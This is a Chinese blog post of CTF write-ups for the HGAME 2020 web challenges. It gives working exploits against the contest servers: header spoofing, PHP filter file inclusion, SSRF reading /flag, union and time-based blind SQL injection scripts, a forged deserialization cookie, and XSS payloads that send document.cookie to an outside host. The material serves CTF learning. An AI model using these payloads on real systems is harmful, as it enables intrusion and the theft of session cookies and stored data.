HGAME 2020

记录一下HGAME2020的Web的部分Web题解

Week1

Cosmos的博客

提示使用了版本管理系统,猜测存在git源码泄露,

发现确实是,使用Githack下载.git文件夹或者直接查看配置文件

发现一个新的GitHub地址,访问,查看commit

发现有一个commit的评论有点多,点开发现一串base64,解码得到flag

接头霸王

根据提示,猜测是http请求头伪造,于是开始伪造

1
curl --referer https://vidar.club/ http://kyaru.hgame.n3ko.co

1
curl --referer https://vidar.club/ -H 'X-Forwarded-For: 127.0.0.1' http://kyaru.hgame.n3ko.co

1
url --referer https://vidar.club/ -H 'X-Forwarded-For: 127.0.0.1'  --user-agent Cosmos Brower http://kyaru.hgame.n3ko.co

1
curl -vs -X POST --referer https://vidar.club/ -H 'X-Forwarded-For: 127.0.0.1'  --user-agent Cosmos Brower http://kyaru.hgame.n3ko.co

1
curl --referer https://vidar.club/ -H 'X-Forwarded-For: 127.0.0.1' -H 'If-Unmodified-Since: Fri, 01 Jan 2077 00:00:00 GMT' --user-agent Cosmos Brower http://kyaru.hgame.n3ko.co -vs -X POST

Code World

访问首页直接跳到new.php,访问index.php,回显405(不合法的请求方式),将GET请求更改为POST请求,得到关键提示

然后这个很明显是?a=两个数相加,但是怎么都不对
后来发现burp的+号要转码,将+进行一下url编码就得到了flag,确实是细节

🐔尼泰玫

蔡徐坤打篮球???在游戏死亡的时候发送一个数据包

|前面是分数,后面是时间戳的md5,于是写出解题脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import requests
import time
import hashlib
def md5vale(key):
    print(key)
    input_name = hashlib.md5()
    input_name.update(key.encode("utf-8"))
    print(input_name.hexdigest())
    return input_name.hexdigest()


sess=requests.Session()
data={
    "score":"30001|"+str(md5vale(str(int(time.time()))))
}
print(data)
url="http://cxk.hgame.wz22.cc/submit"
result=sess.post(url,data).text
print(result)

后来官方wp说这个题直接改js就行。。。

Week2

Cosmos的博客后台

明显的文件包含,读源码

http://cosmos-admin.hgame.day-day.work/index.php?action=php://filter/read=convert.base64-encode/resource=index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
error_reporting(0);
session_start();

if(isset($_SESSION['username'])) {
    header("Location: admin.php");
    exit();
}

$action = @$_GET['action'];
$filter = "/config|etc|flag/i";

if (isset($_GET['action']) && !empty($_GET['action'])) {
    if(preg_match($filter, $_GET['action'])) {
        echo "Hacker get out!";
        exit();
    }
        include $action;
}
elseif(!isset($_GET['action']) || empty($_GET['action'])) {
    header("Location: ?action=login.php");
    exit();
}

http://cosmos-admin.hgame.day-day.work/index.php?action=php://filter/read=convert.base64-encode/resource=admin.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
<?php
include "config.php";
session_start();
if(!isset($_SESSION['username'])) {
    header('Location: index.php');
    exit();
}

function insert_img() {
    if (isset($_POST['img_url'])) {
        $img_url = @$_POST['img_url'];
        $url_array = parse_url($img_url);
        if (@$url_array['host'] !== "localhost" && $url_array['host'] !== "timgsa.baidu.com") {
            return false;
        }   
        $c = curl_init();
        curl_setopt($c, CURLOPT_URL, $img_url);
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
        $res = curl_exec($c);
        curl_close($c);
        $avatar = base64_encode($res);

        if(filter_var($img_url, FILTER_VALIDATE_URL)) {
            return $avatar;
        }
    }
    else {
        return base64_encode(file_get_contents("static/logo.png"));
    }
}
?>

<html>
    <head>
        <title>Cosmos'Blog - 后台管理</title>
    </head>
    <body>
        <a href="logout.php">退出登陆</a>
        <div style="text-align: center;">
            <h1>Welcome <?php echo $_SESSION['username'];?> </h1>
        </div>
        <form action="" method="post">
            <fieldset style="width: 30%;height: 20%;float:left">
                <legend>插入图片</legend>
                <p><label>图片url: <input type="text" name="img_url" placeholder=""></label></p>
                <p><button type="submit" name="submit">插入</button></p>
            </fieldset>
        </form>
        <fieldset style="width: 30%;height: 20%;float:left">
                <legend>评论管理</legend>
                <h2>待开发..</h2>
        </fieldset>
        <fieldset style="width: 30%;height: 20%;">
                <legend>æ–‡ç« åˆ—è¡¨</legend>
                <h2>待开发..</h2>
        </fieldset>
        <fieldset style="height: 50%">
            <div style="text-align: center;">
                <img height='200' width='500' src='data:image/jpeg;base64,<?php echo insert_img() ? insert_img() : base64_encode(file_get_contents("static/error.jpg")); ?>'>
            </div>
        </fieldset>
    </body>
</html>

http://cosmos-admin.hgame.day-day.work/index.php?action=php://filter/read=convert.base64-encode/resource=login.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
<?php
include "config.php";
session_start();

//Only for debug
if (DEBUG_MODE){
    if(isset($_GET['debug'])) {
        $debug = $_GET['debug'];
        if (!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $debug)) {
            die("args error!");
        }
        eval("var_dump($$debug);");
    }
}

if(isset($_SESSION['username'])) {
    header("Location: admin.php");
    exit();
}
else {
    if (isset($_POST['username']) && isset($_POST['password'])) {
        if ($admin_password == md5($_POST['password']) && $_POST['username'] === $admin_username){
            $_SESSION['username'] = $_POST['username'];
            header("Location: admin.php");
            exit();
        }
        else {
            echo "ç”¨æˆ·åæˆ–å¯†ç é”™è¯¯";
        }
    }
}
?>

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>Cosmos的博客后台</title>
    <link href="static/signin.css" rel="stylesheet">
    <link href="static/sticky-footer.css" rel="stylesheet">
    <link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
</head>

<body>

<div class="container">
    <form class="form-signin" method="post" action="login.php">
        <h2 class="form-signin-heading">后台登陆</h2>
        <input type="text" name="username" class="form-control" placeholder="用户名" required autofocus>
        <input type="password" name="password" class="form-control" placeholder="å¯†ç " required>
        <input class="btn btn-lg btn-primary btn-block" type="submit" value="Submit">
    </form>
</div>
<footer class="footer">
	<center>
	<div class="container">
        <p class="text-muted">Created by Annevi</p>
      </div>
      </center>
</footer>
</body>
</html>

简单代码审计,先通过login.php读取全局变量

http://cosmos-admin.hgame.day-day.work/login.php?debug=GLOBALS

1
array(9) { ["_GET"]=> array(1) { ["debug"]=> string(7) "GLOBALS" } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(1) { ["PHPSESSID"]=> string(26) "i3tnfac7utddib1ln6otips5gu" } ["_FILES"]=> array(0) { } ["debug"]=> string(7) "GLOBALS" ["admin_password"]=> string(32) "0e114902927253523756713132279690" ["admin_username"]=> string(7) "Cosmos!" ["_SESSION"]=> &array(0) { } ["GLOBALS"]=> array(9) { ["_GET"]=> array(1) { ["debug"]=> string(7) "GLOBALS" } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(1) { ["PHPSESSID"]=> string(26) "i3tnfac7utddib1ln6otips5gu" } ["_FILES"]=> array(0) { } ["debug"]=> string(7) "GLOBALS" ["admin_password"]=> string(32) "0e114902927253523756713132279690" ["admin_username"]=> string(7) "Cosmos!" ["_SESSION"]=> &array(0) { } ["GLOBALS"]=> *RECURSION* } }

构造POST登录

1
username=Cosmos!&password=QNKCDZO

登陆成功,跳转到admin.php,审计代码,发现和上海市18年的比赛web1差不多ssrf,构造poc

1
file://localhost/../../../../../../flag

成功请求得到flag

Cosmos的留言板-1

看到?id=1,猜测应该是sql注入,尝试注入

1
2
3
4
5
id=1 正常回显
id=1' 无回显
id=1' and '1'='1 回显1'and'1'='1,空格没了
id=1'/**/and/**/'1'='1 正常回显
id=1'/**/and/**/'1'='2 无回显了,基本确定是单引号字符型注入了,开始注入

判断字段数

1
2
id=1'/**/order/**/by/**/1%23 正常回显
id=1'/**/order/**/by/**/2%23 无回显,字段数应该是1

判断显示位

发现输入union的时候啥也没了,猜测存在waf,至少waf掉了union和select,但是大小写可以过

1
id=0'/**/Union/**/Select/**/1%23 回显1

查询数据库名

1
id=0'/**/Union/**/Select/**/database()%23

查询表名

1
id=0'/**/Union/**/Select/**/group_concat(table_name)/**/From/**/information_schema.tables/**/where/**/table_schema=database()%23

查询字段名

1
id=0'/**/Union/**/Select/**/group_concat(column_name)/**/From/**/information_schema.columns/**/where/**/table_name='f1aggggggggggggg'%23

查询数据

1
id=0'/**/Union/**/Select/**/fl4444444g/**/From/**/f1aggggggggggggg%23

得到flag

Cosmos的新语言

访问/mycode,发现加密函数encrypt

1
2
3
4
5
6
7
8
9
10
11
12
13
function encrypt($str){
    $result = '';
    for($i = 0; $i < strlen($str); $i++){
        $result .= chr(ord($str[$i]) + 1);
    }
    return $result;
}

echo(strrev(str_rot13(encrypt(strrev(base64_encode(base64_encode(str_rot13(encrypt(base64_encode(strrev($_SERVER['token'])))))))))));

if(@$_POST['token'] === $_SERVER['token']){
    echo($_SERVER['flag']);
}

写出解密函数

1
2
3
4
5
6
7
function decrypt($str){
    $result = '';
    for($i = 0; $i<strlen($str); $i++){
        $result .= chr(ord($str[$i]) - 1);
    }
    return $result;
}

因为加密过程是动态的,所以给出动态解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
import requests
import base64
import queue
def reverse(s):
    return s[::-1]
def rot13(s, OffSet=13):
    def encodeCh(ch):
         ch=str(ch)
         f=lambda x: chr((ord(ch)-x+OffSet) % 26 + x)
         return f(97) if ch.islower() else (f(65) if ch.isupper() else ch)
    return str(''.join(encodeCh(c) for c in s))
def decrypt(s):
    # print(s)
    result=''
    for i in range(len(s)):
        # print(i,s[i])
        result=result+chr(ord(str(s[i]))-1)
    return result
sess=requests.Session()
miwen=sess.get("http://6a57b5cbe5.php.hgame.n3ko.co").text
# print(miwen)
miwen=miwen.replace(r'''<html><head></head><body><code><span style="color: #000000">
<span style="color: #0000BB"><?php<br>highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br></span><span style="color: #0000BB">$code&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #DD0000">'mycode'</span><span style="color: #007700">);<br>eval(</span><span style="color: #0000BB">$code</span><span style="color: #007700">);<br><br></span>
</span>
</code><br>''','').replace('<br>','').replace('</body>','').replace('</html>','').replace('\n','')
print("密文:",miwen)
a=sess.get("http://6a57b5cbe5.php.hgame.n3ko.co/mycode").text
s=a.replace(r'''function encrypt($str){
    $result = '';
    for($i = 0; $i < strlen($str); $i++){
        $result .= chr(ord($str[$i]) + 1);
    }
    return $result;
}
''','').replace(r'''
if(@$_POST['token'] === $_SERVER['token']){
    echo($_SERVER['flag']);
}''','').replace(';','').replace('echo(','').replace('\n','').replace(' ','')
print("加密函数:",s)
sentense='\"'+miwen+'\"'
while ('(' in s):
    if s.startswith("encrypt"):
        s=s[8:]
        sentense="decrypt("+str(sentense)+")"
        print(sentense,eval(sentense))
    elif s.startswith("str_rot13"):
        s=s[10:]
        sentense="rot13("+str(sentense)+")"
        print(sentense,eval(sentense))
    elif s.startswith("strrev"):
        s=s[7:]
        sentense="reverse("+str(sentense)+")"
        print(sentense,eval(sentense))
    elif s.startswith("base64_encode"):
        s=s[14:]
        sentense="base64.b64decode("+str(sentense)+").decode('utf-8')"
        print(sentense,eval(sentense))
print(sentense)
result=eval(sentense)
print(str(result))
data={
    "token":result
}
q=sess.post("http://6a57b5cbe5.php.hgame.n3ko.co/index.php",data)
print(q.text)

Cosmos的聊天室

先给出解密code的脚本

1
2
3
4
5
6
7
8
9
10
11
import hashlib
def md5vale(key):
    input_name = hashlib.md5()
    input_name.update(key.encode("utf-8"))
    return input_name.hexdigest()
for i in range(5000000,100000000000):
    a=str(md5vale(str(i)))
    # print(i)
    if(a[:6]=="六位数字"):
        print("md5(%d)=%s"%(i,a))
        break

XSS的题我就没做出来过,尝试根据wp复现

参考文章

https://blog.csdn.net/stepone4ward/article/details/104173443

首先双尖括号被过滤,script也被过滤,这里采用html实体编码绕过

原始payload为

1
<img src=x onerror="s=createElement('script');body.appendChild(s);s.src='http://xsspt.com/yourcode?'+Math.random()"

进行HTML实体编码,得到管理员cookie为

1
f802788a02a51f9c624bb5d91815b

替换自己的cookie得到flag即可

Week3

序列之争

访问首页,查看源代码,发现source.zip,下载下来进行审计

根据名字猜测是反序列化,发现反序列化函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$monsterData = base64_decode($_COOKIE['monster']);
if(strlen($monsterData) > 32){
    $sign = substr($monsterData, -32);
    $monsterData = substr($monsterData, 0, strlen($monsterData) - 32);
    if(md5($monsterData . $this->encryptKey) === $sign){
        $this->monsterData = unserialize($monsterData);
    }else{
        session_start();
        session_destroy();
        setcookie('monster', '');
        header('Location: index.php');
        exit;
    }
}

sign是$_COOKIE[‘monster’]base64解码后的后32位

$monsterData是$_COOKIE[‘monster’]base64解码后32位前面的部分
只要满足以下条件即可实现反序列化

1
md5($monsterData . $this->encryptKey) === $sign

monsterData和sign都可以控制得到,现在需要知道$this->encryptKey的值

1
2
3
4
5
6
7
8
9
10
public function __construct($playerName){
    $_SESSION['player'] = $playerName;
    if(!isset($_SESSION['exp'])){
        $_SESSION['exp'] = 0;
    }
    $data = [$playerName, $this->encryptKey];
    $this->init($data);
    $this->monster = new Monster($this->sign);
    $this->rank = new Rank();
}

$this->encryptKey传入data数组,然后对data数组执行$this->init($data)方法,我们定位到init()方法

1
2
3
4
5
6
private function init($data){
    foreach($data as $key => $value){
        $this->welcomeMsg = sprint($this->welcomeMsg, $value);
        $this->sign .= md5($this->sign . $value);
    }
}

发现value会通过$this->welcomeMsg来获得,寻找发现

1
public $welcomeMsg = '%s, Welcome to Ordinal Scale!';

如果我们输入的用户名为%s,就可以利用这里的sprintf()造成格式化输出漏洞函数,得到$this->encryptKey,于是我们输入用户名为%s,得到得到$this->encryptKey为

1
gkUFUa7GfPQui3DGUTHX6XIUS3ZAmClL

于是构造反序列化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
class Rank
{
private $rank = 1; 
private $serverKey; 
private $key;
public function __construct(){ 
    $this->key = &$this->serverKey;
    } 
}
$data = ['don', 'gkUFUa7GfPQui3DGUTHX6XIUS3ZAmClL'];
$sign = '';
foreach($data as $value){
    $sign .= md5($sign . $value); 
}
$rank = serialize(new Rank()); 
echo(base64_encode($rank . md5($rank . $sign)));

得到

1
Tzo0OiJSYW5rIjozOntzOjEwOiIAUmFuawByYW5rIjtpOjE7czoxNToiAFJhbmsAc2VydmVyS2V5IjtOO3M6OToiAFJhbmsAa2V5IjtSOjM7fWM2OWU4ZGUyMzY4Yjc0ZmI4NWNjMzEzZjlmMzY3ZjIy

替换token,得到flag

二发入魂

参考文章
https://www.anquanke.com/post/id/196831

给出大佬写的解密脚本,菜鸡凑活拿来用一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests
import os

url = r"https://twoshot.hgame.n3ko.co/random.php?times=228"
session = requests.session()
response = session.get(url)
# print(response.text)
list = response.text.replace('[','').replace(']','').split(',')
# print(list)
cmd =os.popen("python3 reverse_mt_rand.py "+list[0]+" "+list[227]+" 0 0")
seed = cmd.read().strip()
print(seed)
cmd.close()
urlv = r"https://twoshot.hgame.n3ko.co/verify.php"
response2 = session.post(urlv,data={'ans':seed})
print(response2.text)

Cosmos的二手市场

注册登录后可以买东西,也可以卖东西,但是卖东西的钱少,买东西的钱多,总钱数肯定是只少不多,不会到一百亿,所以猜测存在条件竞争,利用burp小线程买东西,大线程卖东西,一会钱就够了,直接拿flag即可

cosmos的留言板-2

注入点

1
http://139.199.182.61:19999/index.php?method=delete&delete_id=

先随便插入一条数据,然后开始盲注,给出盲注脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
import requests
sess=requests.Session()
loginurl="http://139.199.182.61:19999/login.php"
data={
    'name':'yd0ng',
    'password':'yd0ng',
    'submit':'1'
}
text=sess.post(loginurl,data).text
url="http://139.199.182.61:19999/index.php?method=delete&delete_id=(if(length(database())=%d,sleep(3),0))"
timeout=3
dblength=0
for dblen in range(0,50):
    url="http://139.199.182.61:19999/index.php?method=delete&delete_id=(if(length(database())=%d,sleep(3),0))"%dblen
    print(url)
    try:
        sess.get(url,timeout=timeout)
    except requests.exceptions.ReadTimeout :
        dblength=dblen
        break
print("数据库长度为%d"%dblength)

dbname=''
for pos in range(1,dblength+1):
    for i in range(32,128):
        url="http://139.199.182.61:19999/index.php?method=delete&delete_id=(if(ascii(substr((select database()),%d,1))=%d,sleep(3),0))"%(pos,i)
        try:
            sess.get(url,timeout=timeout)
        except requests.exceptions.ReadTimeout :
            dbname=dbname+chr(i)
            break
print("数据库名为%s"%dbname)

tablenum=0
for tablecount in range(0,50):
    url="http://139.199.182.61:19999/index.php?method=delete&delete_id=(if((select count(*) from information_schema.tables where table_schema=database())=%d,sleep(3),1))"%tablecount
    try:
        sess.get(url,timeout=timeout)
    except requests.exceptions.ReadTimeout :
        tablenum=tablecount
        break
print("表数量为%d"%tablenum)
tablename_len=[]
for num in range(0,tablenum):
    for tablenamelen in range(0,50):
        url="http://139.199.182.61:19999/index.php?method=delete&delete_id=(if((select length(table_name) from information_schema.tables where table_schema=database() limit %d,1)=%d,sleep(3),1))"%(num,tablenamelen)
        try:
            sess.get(url,timeout=timeout)
        except requests.exceptions.ReadTimeout :
            tablename_len.append(tablenamelen)
            break
print("表名长度列表为:",tablename_len)
print("表数量测试为",tablenum)
tablename=[]
for num in range(0,tablenum):
    tmp_name=''
    for pos in range(1,tablename_len[num]+1):
        for i in range(32,128):
            url="http://139.199.182.61:19999/index.php?method=delete&delete_id=(if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),1))"%(num,pos,i)
            try:
                sess.get(url,timeout=timeout)
            except requests.exceptions.ReadTimeout :
                tmp_name=tmp_name+chr(i)
                break
    tablename.append(tmp_name)
print('表名列表为',tablename)

columnnum=0
tabledump='user'
for columncount in range(0,50):
    url="http://139.199.182.61:19999/index.php?method=delete&delete_id=(if((select count(*) from information_schema.columns where table_name=\'%s\')=%d,sleep(3),1))"%(tabledump,columncount)
    try:
        sess.get(url,timeout=timeout)
    except requests.exceptions.ReadTimeout :
        columnnum=columncount
        break
print("%s表字段数量为%d"%(tabledump,columnnum))

columnname_len=[]
for num in range(0,columnnum):
    for columnnamelen in range(0,50):
        url="http://139.199.182.61:19999/index.php?method=delete&delete_id=(if((select length(column_name) from information_schema.columns where table_name=\'%s\' limit %d,1)=%d,sleep(3),1))"%(tabledump,num,columnnamelen)
        try:
            sess.get(url,timeout=timeout)
        except requests.exceptions.ReadTimeout :
            columnname_len.append(columnnamelen)
            break
print("%s表字段长度列表为:"%tabledump,columnname_len)

columnname=[]
for num in range(0,columnnum):
    tmp_name=''
    for pos in range(1,columnname_len[num]+1):
        for i in range(32,128):
            url="http://139.199.182.61:19999/index.php?method=delete&delete_id=(if(ascii(substr((select column_name from information_schema.columns where table_name=\'%s\' limit %d,1),%d,1))=%d,sleep(3),1))"%(tabledump,num,pos,i)
            try:
                sess.get(url,timeout=timeout)
            except requests.exceptions.ReadTimeout :
                tmp_name=tmp_name+chr(i)
                break
    columnname.append(tmp_name)
print("%s表的字段为"%tabledump,columnname)
print(tabledump)

datanum=0
for datacount in range(0,5000):
    url="http://139.199.182.61:19999/index.php?method=delete&delete_id=(if((select count(*) from %s)=%d,sleep(3),1))"%(tabledump,datacount)
    try:
        sess.get(url,timeout=timeout)
    except requests.exceptions.ReadTimeout :
        datanum=datacount
        break
print("%s表数据数量为%d"%(tabledump,datanum))

dataname_len=[]
for num in range(0,datanum):
    tmp=[]
    for column in columnname:
        for datalen in range(0,50):
            url="http://139.199.182.61:19999/index.php?method=delete&delete_id=(if((select length(%s) from %s limit %d,1)=%d,sleep(3),1))"%(column,tabledump,num,datalen)
            try:
                sess.get(url,timeout=timeout)
            except requests.exceptions.ReadTimeout :
                tmp.append(datalen)
                break
    dataname_len.append(tmp)
print("%s表字段长度列表为:"%tabledump,dataname_len)
data=[]
for num in range(0,datanum):
    tmp=[]
    for column in range(0,len(columnname)):
        tmp_data=''
        for pos in range(1,dataname_len[num][column]+1):
            for i in range(32,128):
                url="http://139.199.182.61:19999/index.php?method=delete&delete_id=(if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d,sleep(3),1))"%(columnname[column],tabledump,num,pos,i)
                try:
                    sess.get(url,timeout=timeout)
                except requests.exceptions.ReadTimeout :
                    tmp_data=tmp_data+chr(i)
                    break
        tmp.append(tmp_data)
    print(tmp)
    data.append(tmp)
print(data)

得到cosmos的账号密码,登录得到flag

1
['1', 'cosmos', 'f1FXOCnj26Fkadzt4Sqynf6O7CgR']

Cosmos的聊天室

过滤了script,双写绕过即可,没复现成功,玄学操作

给出理论上可以打的exp

1
<scriscriptpt src="/send?message=window.open('http://ip:port/?'%2bdocument.cookie)"></scscriptript>
本文作者: yd0ng
本文链接: https://yd0ng.github.io/2020/02/13/HGAME-2020/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!

谢谢您的打赏,大家一起加油喔~

支付宝
微信

扫一扫,分享到微信

微信分享二维码

阅读数: 次   
载入天数...载入时分秒...

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

网络安全<br>敬畏技术<br>保持正直